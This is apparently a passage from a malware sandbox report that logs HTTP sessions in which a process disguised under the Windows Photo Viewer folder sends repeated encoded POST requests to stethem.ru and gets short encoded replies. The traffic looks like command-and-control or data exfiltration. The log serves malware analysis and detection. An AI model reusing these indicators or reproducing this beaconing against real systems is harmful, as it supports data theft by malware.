Dec 28, 2024 22:19:57.438144922 CET	1236	OUT	Data Raw: 20 25 2d 0c 22 23 29 56 27 07 0f 0e 2b 51 3c 02 3f 1e 3d 5e 30 3a 20 56 28 33 24 52 27 39 26 12 24 10 3d 0f 26 3c 08 5b 24 2e 38 53 2e 2f 00 1a 21 3f 2f 0e 2f 2d 2f 5e 27 20 2e 40 21 10 39 5f 23 07 08 0c 31 38 25 5c 22 29 33 51 2f 29 22 0d 2a 39 Data Ascii: %-"#)V'+Q<?=^0: V(3$R'9&$=&<[$.8S./!?//-/^' .@!9_#18%\")3Q/)"9(C<2#&R=.R(>,58'+^&'&#=?+#4 P$2]-#+=)WQ0W+ <>&8!=[?7++_0889,>X57$;='$B 6;$2(X:Y;$"V9?)-:I4('B.2)(1
Dec 28, 2024 22:19:58.006860971 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:58.166874886 CET	939	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v334fO0r934fBSycBrzP7E6VU47V0xdYKGieV7PYO4BcRxoLvDhlYRgGS6FvuKEa0bHrC%2Bm1zgr0dq5NFlKZ6iYjgcLoGDbO%2FFyzCzAThKy0sBBS9PgGX0X7OLXd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94977218457c9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3530&min_rtt=1879&rtt_var=4007&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2075&delivery_rate=96765&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 1d 20 1c 2e 1c 21 1d 35 11 24 17 26 53 28 27 09 13 2b 23 2d 12 27 17 09 0f 3d 33 34 55 33 00 2e 59 30 00 36 57 24 02 08 12 31 29 28 51 06 12 22 19 20 2f 24 0e 39 3a 2f 5d 27 30 26 09 21 03 21 13 24 29 2d 55 32 38 22 03 35 3a 3f 51 3b 5c 25 52 29 29 3c 08 3c 1f 2e 10 20 2b 2e 57 02 13 27 57 3c 3e 3c 0f 36 08 3f 59 27 28 2f 15 21 3c 21 16 27 5f 36 10 37 03 37 5c 3e 02 0e 5f 23 24 27 1d 3d 3a 37 5f 37 38 2b 0d 28 13 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98" .!5$&S('+#-'=34U3.Y06W$1)(Q" /$9:/]'0&!!$)-U28"5:?Q;\%R))<<. +.W'W<><6?Y'(/!<!'_677\>_#$'=:7_78+("U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49912	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:56.961308956 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:57.344394922 CET	1236	OUT	Data Raw: 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 39 36 2e 30 2e 34 36 36 34 2e 34 35 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 0d 0a 48 6f 73 74 3a 20 Data Ascii: ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: stethem.ruContent-Length: 1072Expect: 100-continueConnection: Keep-AliveZ^X\[DTT\WWVZ\TVUPYQUUWXZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XY
Dec 28, 2024 22:19:57.517128944 CET	1072	OUT	Data Raw: 5a 5e 58 5c 5b 44 54 54 5c 57 57 56 5a 5c 54 56 55 50 59 51 55 55 57 58 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z^X\[DTT\WWVZ\TVUPYQUUWXZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:++>Y%Z'$\##X,\0>363]2%%'-<![",\-&
Dec 28, 2024 22:19:58.483939886 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:58.715867996 CET	796	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=189M%2FbEZL4QLw6Pc0ze1Leyazf%2BX7u4KCoqjaTwNHUhjPj7olSfEyegcQ6S4At72tZNzBbCke2Vw7sG%2F3CdZwMq%2FzU%2FmIivDkCcQ8ANYLbCR5pGAdjdUzl16vMj2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497758fb732e2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4718&min_rtt=1948&rtt_var=6270&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=60560&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49918	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:59.168389082 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:59.516386032 CET	1072	OUT	Data Raw: 5a 5a 5d 51 5e 45 51 51 5c 57 57 56 5a 59 54 52 55 53 59 58 55 50 57 5e 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZZ]Q^EQQ\WWVZYTRUSYXUPW^ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:)#4?.1Z X3'(#'/90Z&-0Q"&X$5-0()\,![",\-2
Dec 28, 2024 22:20:00.347388029 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:20:00.598431110 CET	789	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HyEwZhg1Rd5d4s8LGqHEpCCCtfhjNBXGYwPT7WWEW4hjqo9It7noXrmGxi8R4%2Fb7vucorOKgCyisahYz5fKk7DZNUUGaLImfAXktS9yecgSDRvaH6zTZRO4ik9VF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949781289b7280-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3420&min_rtt=1983&rtt_var=3618&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=108308&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49920	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:00.851124048 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:20:01.203918934 CET	1072	OUT	Data Raw: 5f 5b 58 57 5b 47 54 56 5c 57 57 56 5a 59 54 53 55 57 59 51 55 56 57 5b 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _[XW[GTV\WWVZYTSUWYQUVW[ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:*U <1Z#33^4';:?$='"6$5C0(;![",\-2
Dec 28, 2024 22:20:01.936166048 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:20:02.181790113 CET	804	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9Q3V2lwYJzJHjQZNwPc%2Bu81VywcscSFuuS0Cl3Myop%2B9jUvPY%2BkfM3%2B1q%2FG7%2BSJfgA42Fd9j%2FlPLqPAxFzpnAXePQdX%2FNDK61246kZ6zdAKMni3h6h%2Fi2gMbeOl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94978b2f2c43fa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4898&min_rtt=2040&rtt_var=6482&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=58610&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49926	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:02.474317074 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:20:02.828917027 CET	1072	OUT	Data Raw: 5a 53 5d 50 5e 49 54 54 5c 57 57 56 5a 5b 54 5b 55 5b 59 5a 55 5c 57 5f 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZS]P^ITT\WWVZ[T[U[YZU\W_ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:>3<."%Z7'7[ )^,:0Y0/551660;=X/![",\-:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49929	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:03.294011116 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:20:03.641390085 CET	1788	OUT	Data Raw: 5a 59 58 57 5e 47 51 50 5c 57 57 56 5a 5f 54 53 55 51 59 5e 55 54 57 5c 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZYXW^GQP\WWVZ_TSUQY^UTW\ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:U4+=5'?$X3$74'^/(X'8P!#&D'(%-,![",\-*
Dec 28, 2024 22:20:04.379255056 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:20:04.624774933 CET	945	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NVTunhZAF9T3D3OWyq%2B%2FFu8WjrNBiIROTs%2BYmoOOrGzbOKTo8HalHCAvBT7FlRUWriX45gKJiwEX3c%2FS%2FXxJOJe3uMTx1FW2AOmq7vJyowSnVWEgNzTONddowSWp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94979a69308c4e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4187&min_rtt=2031&rtt_var=5074&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=75714&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 57 22 35 03 0e 22 20 35 53 27 5f 2e 1b 29 24 3c 01 28 1e 07 13 27 39 24 56 3e 55 2b 0d 24 07 25 06 33 2e 3e 54 26 3c 26 11 24 39 28 51 06 12 21 40 22 3c 33 1f 3a 03 37 14 27 20 2e 43 22 2d 35 11 25 2a 29 51 25 38 0f 58 36 07 2f 51 2f 04 0b 52 3e 17 28 0a 2a 21 0b 03 37 01 2e 57 02 13 27 1a 3f 58 23 54 22 21 16 05 27 38 33 5e 22 2f 25 54 24 29 0c 53 37 03 2f 5c 29 2f 24 5c 22 34 2c 0c 2a 2a 37 5b 21 3b 33 0f 3f 03 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"W"5" 5S'_.)$<('9$V>U+$%3.>T&<&$9(Q!@"<3:7' .C"-5%)Q%8X6/Q/R>(!7.W'?X#T"!'83^"/%T$)S7/\)/$\"4,**7[!;3?"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49930	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:03.416520119 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:20:03.766802073 CET	1072	OUT	Data Raw: 5f 5f 58 55 5b 40 54 55 5c 57 57 56 5a 5b 54 56 55 50 59 5b 55 51 57 52 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: __XU[@TU\WWVZ[TVUPY[UQWRZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9)3#<%%<3&44";,:,Z0$Q##!$5@3^:/![",\-:
Dec 28, 2024 22:20:04.593836069 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:20:04.846518040 CET	794	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WftB%2BDa5V9I8RNHMI%2B8GgJqTP6qfTwhcIYH4wAJnHWE%2FynNHLhsWMCr2XZSRBOfG8I4iOEJaUVaQPEiPtPK%2FEGby0ilg2Pc6wumjFIp2HFQeEqs3hlytTl1TcHvK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94979bbea37cf0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3918&min_rtt=2020&rtt_var=4553&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=84863&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49934	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:05.218703985 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:20:05.563271999 CET	1072	OUT	Data Raw: 5a 5f 5d 50 5b 42 51 51 5c 57 57 56 5a 59 54 55 55 52 59 5e 55 52 57 5b 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z_]P[BQQ\WWVZYTUURY^URW[ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9* (>9',+$4_ +;)/3"U51*B$8&/![",\-2
Dec 28, 2024 22:20:06.395478964 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:20:06.646306992 CET	793	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=04lE0A3iox%2BnsfYsIID9XxqT5cIij9i2bUVYHbPbGMIrA8%2FzHLfJ6uQV1hApQUNMCaO6jBz35tyqsc%2BtAG4zJd0q4bNP79IIjBIYcO9Yqf4ZFSgxZOXBdLPy89wp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497a6fcc97c7b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7188&min_rtt=1991&rtt_var=11142&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=33507&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49940	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:06.999416113 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1064 Expect: 100-continue
Dec 28, 2024 22:20:07.352520943 CET	1064	OUT	Data Raw: 5f 5f 58 53 5b 45 51 52 5c 57 57 56 5a 5d 54 50 55 5a 59 5e 55 57 57 5d 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: __XS[EQR\WWVZ]TPUZY^UWW]ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9]*#4^+X:1Z7'0#9(,9]&=!%&=$!\;![",\-.
Dec 28, 2024 22:20:08.042593002 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:20:08.285207033 CET	800	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:20:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VvPX%2Fvbp%2BAyv%2B7ufVN6MF4v%2BfAsh60a1OmhxZkyQPpuQ1Ou4Uhz%2BpnIGfSHJkclmWYYpw5v%2B0n1JShTjA4eSyLw5Exfr%2F7JkxUX0ennpQDfuPkg2td6vkBnSiE8G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9497b13da578d9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8314&min_rtt=1966&rtt_var=13434&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1363&delivery_rate=27675&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49945	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:08.523710966 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:20:08.875834942 CET	1072	OUT	Data Raw: 5a 5d 5d 56 5e 42 54 55 5c 57 57 56 5a 55 54 57 55 52 59 58 55 52 57 5f 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z]]V^BTU\WWVZUTWURYXURW_ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:)#^(-=%?#3$/_7\,]'=0"-2&%(_/![",\-
Dec 28, 2024 22:20:09.720176935 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49947	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:20:09.762558937 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:20:10.120929003 CET	1788	OUT	Data Raw: 5f 59 58 52 5b 44 51 56 5c 57 57 56 5a 5b 54 54 55 57 59 5b 55 51 57 5c 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _YXR[DQV\WWVZ[TTUWY[UQW\ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9+3 Y?&%,803Z43,&>'63]2&>%8/<![",\-:
Dec 28, 2024 22:20:10.846952915 CET	25	IN	HTTP/1.1 100 Continue
